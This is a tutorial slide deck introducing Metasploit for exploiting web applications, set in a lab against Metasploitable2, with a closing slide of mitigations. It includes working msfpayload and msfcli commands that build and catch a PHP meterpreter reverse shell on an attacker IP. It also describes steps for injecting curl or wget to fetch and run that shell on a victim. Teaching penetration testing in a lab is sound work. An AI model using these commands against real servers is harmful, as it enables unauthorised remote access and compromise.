Post on 24-Dec-2015
Introduction to Metasploit:
Exploiting Web Applications
Dennis Maldonado@DennisMald
Dennis Maldonado
Application Security Specialist WhiteHat Security
Full-Time Student University of Houston – Main Campus ▪ Computer Information Systems Major
Twitter @DennisMald
Website / Blog KernelMeltdown.org
Tools
Kali Linux – Our attacker machine
Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.
Metasploitable2 – Victim Web Server
Topic of the dayExploiting the backend server through a web application.
What’s the problem?
Reasons why hackers want to compromise the server: Run attacks against the internal network Use the server as a bot Install backdoors onto the server Reveal sensitive files/passwords Execute any local file Execute remote files and more…
What’s the problem?
Vulnerabilities that are dangerous against a server Directory Traversal Local File Inclusion Remote File Inclusion Remote Code Execution SQL Injection Command Injection
Directory Traversal
http://website.com/?page=index.php
Local File Inclusion
http://website.com/?page=index.php
Remote File Inclusion
http://website.com/?page=index.php
Remote Code Execution
http://website.com/
SQL Injection
http://website.com/user.php?id=1&Submit=Submit#
Command Injection
Metasploit Basics
The Metasploit Project
Metasploit is an open-source framework used for Security development and testing Information gathering and fingerprinting Exploitation/Penetration testing Payload generation and encoding Fuzzing And much more…
Metasploit Interfaces
Command Line Interfaces msfconsole msfcli
GUI Interfaces Metasploit Community Edition Armitage
Metasploit Modules
Modules Exploit – Exploitation/Proof-of-Concept code▪ Ruby on Rails exploit▪ PHP-CGI exploit
Auxiliary – Misc. modules for multiple purposes▪ Scanners▪ DDOS tools▪ Fingerprinting▪ Clients
Payloads – Code to be executed on the exploited system▪ System Shells▪ Meterpreter Shells
Post – Modules for post-exploitation tasks▪ Persistence▪ Password Stealing▪ Pivoting
Exploits
Active Exploits Actively exploit a host. Ex: Ruby on Rails XML exploit
Passive Exploits Wait’s for incoming hosts, then exploits
them Ex: Java 0-days
Exploits contain payloads
Payloads
Inline (Non Staged) Payload containing the exploit and shell code Stable Large size
Staged Exploits victim, establishes connection with
attacker, pulls down the payload Meterpreter
Advanced, dynamic payload. Extended over the network Extensible through modules and plugins
Payloads continued
Types of connections Bind▪ Local server gets started on victim machine▪ Attacker connects to victim▪ windows/x64/shell/bind_tcp
Reverse▪ Local server gets started on attacker machine▪ Victim connects to attacker▪ windows/x64/shell/reverse_tcp
Vulnerabilities and Exploit Examples
PHP-CGI Argument Injection
CVE 2012-1823 DOS attack▪ -T 10000
Source code disclosure▪ -s argument
Remote Code Execution▪ -d argument
Ruby on Rails XML Parameter Parsing Vulnerability
CVE-2013-0156 Easy to find, easy to
exploit, critical vulnerability.
Requires just one POST request containing a specially crafted XML data.
Send commands through YAML objects
Unrestricted File Upload
The upload functionality allows for any file type to be uploaded1. Upload server-side code and check if it
executes▪ PHP = <?php echo “Hello World!”; ?>▪ ASP = <% Response.Write "Hello World!" %>▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell3. Use msfcli to listen for a connection from the
victim4. Upload the shell and execute it
Command Injection
Allows an attacker to execute system level commands.1. Attempt a safe command
1. echo test2. uname -a
2. Use msfpayload to create a shell3. Use msfcli to listen for a connection from
the victim4. Inject curl or wget commands to download
the shell onto the victim machine.5. Chmod if necessary and execute
Commands used(Note, IP addresses and ports may be different)
msfpayload php/meterpreter/reverse_tcp O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
# Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.
==================================
msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
Mitigations and Closing
Mitigations
Keep software up to date! PHP: 5.4.3, 5.3.13 Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
Use whitelisting for file upload extensions Watch for extensions and content-types Don’t let upload directory be executable Rename files if possible
Don’t pass user input as a system command! Use library calls when possible Sanitize input
Questions? Comments?
Sources
BackTrack-Linux http://www.kali.org/
The Metasploit Project http://www.metasploit.com/
Metasploit Unleashed http://www.offensive-security.com/metasploit-unleashed/
PHP-CGI Advisory http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
Ruby on Rails Exploitation https://
community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
Damn Vulnerable Web Application (DVWA) http://www.dvwa.co.uk/
Metasploitable 2 http://
information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web